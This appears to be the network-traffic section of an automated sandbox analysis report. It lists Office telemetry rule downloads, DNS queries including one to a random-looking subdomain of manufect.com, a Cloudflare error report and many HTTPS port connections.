Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: t3sp2vzrhieujyp67175b9328f1f.manufect.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /report/v4?s=%2BKskuMuHsWuq9H5SQ1x4a5A7T3NZ2oXBaxR1lKURcEHtRoX%2BH%2Fyd4B8zmGEXUX4Uh5T%2FwgeFlPo%2Bh7wvW1VWa3aZ8Q2qj5oKscW3NVhpAbRnYobsSockpjWlhXYr4Bj4sRe3sfSu7nm2TF68jbvevxgsuYJHqI7LWUjHqg%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 534Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 04:47:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BKskuMuHsWuq9H5SQ1x4a5A7T3NZ2oXBaxR1lKURcEHtRoX%2BH%2Fyd4B8zmGEXUX4Uh5T%2FwgeFlPo%2Bh7wvW1VWa3aZ8Q2qj5oKscW3NVhpAbRnYobsSockpjWlhXYr4Bj4sRe3sfSu7nm2TF68jbvevxgsuYJHqI7LWUjHqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d6f16598aaaea9c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1064&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1279&delivery_rate=2625566&cwnd=225&unsent_bytes=0&cid=d3fa1e1d4088614c&ts=1368&x=0"
Source: chromecache_42.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
